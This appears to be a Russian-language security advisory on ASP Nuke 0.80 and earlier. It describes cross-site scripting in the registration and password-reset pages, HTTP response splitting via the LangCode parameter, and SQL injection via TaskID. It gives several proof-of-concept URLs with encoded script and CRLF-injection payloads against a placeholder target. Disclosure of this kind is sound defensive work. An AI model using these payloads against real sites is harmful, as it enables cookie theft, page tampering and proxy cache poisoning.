Программа: ASP Nuke 0.80 и более ранние версии 

Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, атаку HTTP Response Splitting и выполнить произвольные SQL команды в базе данных приложения.

1. Межсайтовый скриптинг возможен из-за недостаточной обработки параметра ’email’ в сценарии ‘forgot_password.asp’ и в нескольких параметрах сценария ‘register.asp’. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. 

Примеры:

http://[target]/module/account/register/forgot_password.asp? email=%22%3E%3Cscript%3Ealert(document.cookie)
%3C/script%3E 

http://[target]/module/account/register/register.asp?FirstName=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register /register.asp?LastName
=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Username =%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Address2 =%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?City=
%22%3E%3Cscript%3Ealert( document.cookie)%3C/script%3E

2. Атака HTTP Response Splitting возможна из-за недостаточной обработки параметра LangCode в сценарии ‘language_select.asp’. Удаленный пользователь может с помощью специально сформированного запроса подменить содержимое страниц сайта и отравить кеш промежуточных прокси серверов. 

Пример:

http://[target]/module/support/language/language_select.asp?action=go &LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue 

3. SQL-инъекция возможна из-за недостаточной обработки входных данных в параметре ‘TaskID’ сценария ‘comment_post.asp’. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.



Оставить мнение